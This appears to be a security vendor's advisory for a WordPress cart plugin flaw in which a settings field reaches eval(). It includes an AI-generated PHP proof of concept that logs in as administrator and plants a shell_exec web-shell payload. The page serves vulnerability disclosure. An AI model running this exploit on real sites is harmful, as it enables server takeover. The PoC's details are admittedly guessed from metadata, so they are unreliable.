Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2019: Cart All In One For WooCommerce <= 1.1.21 – Authenticated (Administrator+) Code Injection via 'sc_assign_page' Setting (woo-cart-all-in-one)

CVE ID CVE-2026-2019
Plugin woo-cart-all-in-one
Severity High (CVSS 7.2)
CWE 74
Vulnerable Version 1.1.21
Patched Version
Disclosed February 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2019 (metadata-based):
This vulnerability is an authenticated code injection flaw in the Cart All In One For WooCommerce WordPress plugin. The ‘Assign page’ field, labeled ‘sc_assign_page’ internally, passes user-supplied data directly to the eval() function without proper sanitization. Attackers with administrator privileges can execute arbitrary PHP code on the server, leading to full server compromise.

Atomic Edge research identifies the root cause as CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component. The vulnerability description explicitly states the plugin passes the ‘Assign page’ field value directly to eval(). This indicates the plugin likely retrieves the ‘sc_assign_page’ parameter from a POST request, stores it in the database via update_option(), then later retrieves and executes it via eval() without validation. These conclusions are inferred from the CWE classification and vulnerability description, not confirmed via source code review.

Exploitation requires administrator-level access to WordPress. Attackers would navigate to the plugin’s settings page, typically found at /wp-admin/admin.php?page=woo-cart-all-in-one or a similar admin menu slug. They would submit a POST request containing the malicious PHP code in the ‘sc_assign_page’ parameter. A payload like `system($_GET[‘cmd’]);` would allow subsequent command execution via HTTP parameters. The exact AJAX action or admin endpoint name is unspecified in metadata, but WordPress plugin patterns suggest it processes settings through admin_post or wp_ajax hooks.

Remediation requires replacing the eval() call with a safe alternative. The plugin should implement a strict allowlist of expected values for the ‘Assign page’ field, such as valid page IDs or slugs. If dynamic code execution is absolutely necessary, the plugin must implement a sandboxed environment with disabled dangerous functions. The patched version 1.1.22 likely removes the eval() usage entirely or adds input validation before execution.

Successful exploitation grants attackers arbitrary PHP code execution with web server privileges. This enables complete server control, including file system access, database manipulation, and remote shell establishment. Attackers can install persistent backdoors, steal sensitive data, or pivot to internal network systems. The CVSS 7.2 score reflects the high impact tempered by the administrator privilege requirement.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC 
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2019 - Cart All In One For WooCommerce <= 1.1.21 - Authenticated (Administrator+) Code Injection via 'sc_assign_page' Setting
<?php
/**
 * Proof of Concept for CVE-2026-2019
 * Assumptions based on metadata:
 * 1. Administrator credentials are required
 * 2. Plugin processes settings via admin POST endpoint
 * 3. Parameter name is 'sc_assign_page' based on description
 * 4. Settings page uses standard WordPress admin form submission
 */

$target_url = 'https://vulnerable-site.com';
$username = 'admin';
$password = 'password';

// Initialize session
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Step 1: Authenticate to WordPress
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
);

curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
$response = curl_exec($ch);

// Verify login by checking for admin dashboard
if (strpos($response, 'Dashboard') === false) {
    die('Authentication failed');
}

// Step 2: Locate plugin settings page
// Metadata doesn't specify exact settings page URL
// Common pattern: /wp-admin/admin.php?page=woo-cart-all-in-one
$settings_url = $target_url . '/wp-admin/admin.php?page=woo-cart-all-in-one';
curl_setopt($ch, CURLOPT_URL, $settings_url);
curl_setopt($ch, CURLOPT_POST, false);
$settings_page = curl_exec($ch);

// Step 3: Extract nonce from settings page
// WordPress admin forms include nonce for security
preg_match('/name="_wpnonce" value="([a-f0-9]+)"/', $settings_page, $nonce_matches);
$nonce = $nonce_matches[1] ?? '';

if (empty($nonce)) {
    // Alternative: try to find the form action
    preg_match('/action="([^"]+)"/', $settings_page, $action_matches);
    $form_action = $action_matches[1] ?? $settings_url;
}

// Step 4: Construct exploit payload
// PHP code that will be executed via eval()
$php_payload = "echo 'Atomic Edge Test: ' . shell_exec($_GET['cmd']);";

// Step 5: Submit malicious settings
$exploit_data = array(
    'sc_assign_page' => $php_payload,
    '_wpnonce' => $nonce,
    '_wp_http_referer' => $settings_url,
    'submit' => 'Save Changes'
);

$exploit_url = $form_action ?? $settings_url;
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
$exploit_response = curl_exec($ch);

// Step 6: Trigger code execution
// The plugin likely executes the stored code on cart pages
// This step requires knowing where the eval() occurs
// Without code review, we cannot reliably trigger execution

echo 'Payload submitted. Manual verification required:n';
echo '1. Visit any cart page to trigger eval()n';
echo '2. Append ?cmd=whoami to URL for command executionn';

curl_close($ch);
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School